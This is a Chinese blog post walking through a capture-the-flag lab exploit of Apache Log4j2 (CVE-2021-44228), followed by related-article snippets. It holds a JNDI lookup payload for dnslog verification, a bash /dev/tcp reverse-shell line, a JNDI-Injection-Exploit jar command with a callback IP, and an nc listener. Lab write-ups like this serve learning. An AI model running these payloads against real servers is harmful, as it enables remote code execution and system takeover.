安鸾渗透实战平台——apache log4j2验证并反弹shell

已于 2022-01-27 20:31:49 修改
阅读量2.5k 收藏 3
点赞数 1
分类专栏: 安鸾渗透实战平台 文章标签: web安全
于 2022-01-27 20:08:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50985113/article/details/122722999
版权

漏洞环境

安鸾渗透实战平台-命令执行-最后一个靶场
公网vps一台
java脚本:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar一个

漏洞验证

1、从dnslog中获取DNS信息

55kdyo.dnslog.cn

http://www.dnslog.cn/
在这里插入图片描述

2、在可能存在的地方进行输入

${jndi:ldap://${sys:java.version}.55kdyo.dnslog.cn}

在这里插入图片描述

3、出现对应的反弹信息表示漏洞存在

在这里插入图片描述

漏洞利用

1、使用公网IP接收反弹shell

bash -i >& /dev/tcp/IP/端口 0>&1

在这里插入图片描述

2、构造一个恶意类



bash -c {base64转码的内容}|{base64,-d}|{bash,-i}

用java脚本执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {base64转码的内容}|{base64,-d}|{bash,-i}" -A"192.168.197.1"

-A指定回连IP(这里应该是公网IP,以便能收到反弹shell)

根据版本选择
在这里插入图片描述

3、目标机上启用监听

nc -vv -l -p 5555

4、在对应目标处放置并提交

在这里插入图片描述

获得shell
在这里插入图片描述

5、现在在tomcat目录,用3次cd…跳到主目录下

在这里插入图片描述

ls发现有个flag文件,使用cat flag查看
在这里插入图片描述

复制提交即可
在这里插入图片描述

文中所使用的Java脚本,私聊作者

阿文、...
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Log4j2紧急缓解措施.docx
12-16
Apache Log4j2 紧急缓解措施 Apache Log4j2 是一个流行的 Java 日志记录工具,但最近出现了严重的安全漏洞, Apache Log4j2 紧急缓解措施旨在帮助开发者尽快修复该漏洞,避免攻击者的攻击。 一、修改启动脚本 在...
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
【漏洞复现】Apache Log4j2 (CVE-2021-44228)
weixin_49848824的博客
01-24 1438
一、原理: 本图借用:https://blog.csdn.net/hilaryfrank/article/details/121939902 二、环境准备 1、靶场:http://vulfocus.fofa.so/#/dashboard(fofa出了点问题,暂时无法访问) 2、靶场:https://ctf.show/challenges 3、docker自建: 查找关于Log4j2的镜像 docker search Log4j2 拉取一个dockers镜像 docker pul
log4j2的核弹级bug排查与验证过程
lk的博客
12-11 4398
Apache Log4j2 的 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。问题复现过程,以及相关原理,还有修复建议如下
Apache log4j2(CVE-2021-44228)漏洞(复现详细过程)
m0_52701599的博客
03-31 809
Apache log4j2(CVE-2021-44228)漏洞(复现详细过程)
Log4j2漏洞(一)原理和dnslog验证
02-06 1591
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
[WEB攻防]Apache log4j2 远程代码漏洞(CVE-2021-44228)安鸾靶场复现 +学习过程
AAAAAAAAAAAA66的博客
01-25 2004
中华人民共和国网络安全法(出版物)_360百科 其实搭建好环境,再利用其实很快能复现,但对我来说就是配置各种环境(java ldap 防火墙……)麻烦,另外在网上也没找到write up ,所以只能找一些相关的来学习,虽然走了不少弯路,但也学到不少相关的技巧与知识。 目录 漏洞原理 复现过程 检测 利用 防御方法 总结 漏洞原理 官方: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。...
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Apache Log4j 2 (apache-log4j-2.17.1-bin.zip)
01-07
Apache Log4j 2 (apache-log4j-2.17.1-bin.zip)是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了重大改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。修复了安全漏洞 CVE-...
Apache Log4j 2 (apache-log4j-2.17.1-bin.tar.gz)
01-07
Apache Log4j 2 (apache-log4j-2.17.1-bin.tar.gz)是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了重大改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。修复了安全漏洞 CVE-...
基于Java的Apache Log4j 2日志记录库设计源码
最新发布
05-22
Apache Log4j 2日志记录库设计源码:该项目基于Java开发,...Apache Log4j 2是一个升级版的Log4j,它在Log4j 1.x的基础上提供了显著的改进,并提供了Logback的一些改进特性,同时修复了Logback架构中的某些固有问题。
log4j使用实战
恐龙弟旺仔的博客
05-06 542
前言: 每次排查log相关的问题总会被逼疯,log4j、logback、log4j2这几个之间的关系,尤其再加上slf4j,那酸爽,经历过的人都懂。 所以才促成了笔者这一个系列的博客:log4j实战、logback实战、log4j2实战。 我们从三个方法来实战每一种log类型:log单独使用、log与slf4j的组合、springboot与log的组合。 当然,笔者这个系列的文章,并不是科普类文章,有关于log.xml如何配置这些知识点网络上已经有很多文章了,不再赘述。 希望整理完这个系列之后
Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell
Hi~ 土拨鼠
12-16 4991
文章目录1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell 最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是做安全的嘛!今天我就来复现一下 1、构造EXP import java.io.BufferedReader; import java.io.InputStream; i
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2497
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
反弹Shell原理与实现
m0_62451321的博客
11-14 3081
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
log4j复现及难点解决
小城的博客
04-05 5053
卡了我好多天的难题终于解决了铁子们,太激动了。之前做这个实验用的是别人的服务器,没遇到过这个问题。这次自己买了个服务器,没想到却发生了反弹失败的情况。 log4j反弹地址一定要公网服务器,所以我买了一台公网服务器。 但是公网服务器的端口策略是没有开放的,导致监听端口没办法得到回应,最后失败。 请教大屌之后,才解决了这个难题,大屌yyds。接下来记录一下我的实验过程。 环境 一个log4j漏洞的网站 一台公网服务器(端口策略开放) 接下来的实验将以 115.115.115.115
Log4j2远程命令执行(CVE-2021-44228)
weixin_48817799的博客
01-25 1071
Log4j2远程命令执行(CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
Log4j2漏洞(二)3种方式复现反弹shell
02-08 1345
Log4j2漏洞(二)3种方式复现反弹shell,有对环境要求苛刻的、有步骤多的、也有简单易现的,复现时按需要选择,如果是学习我建议都学习下。
Apache Log4j2 RCE(CVE-2021-44228)
weixin_60329395的博客
11-12 1172
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将**用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行(RCE)
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
05-31
验证是否存在Apache Log4j2远程代码执行漏洞(CVE-2021-44228),可以使用以下步骤: 1. 确认您的应用程序中是否使用了Apache Log4j2。检查您的应用程序的依赖库和配置文件。 2. 确认您的应用程序是否使用了Log4j2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值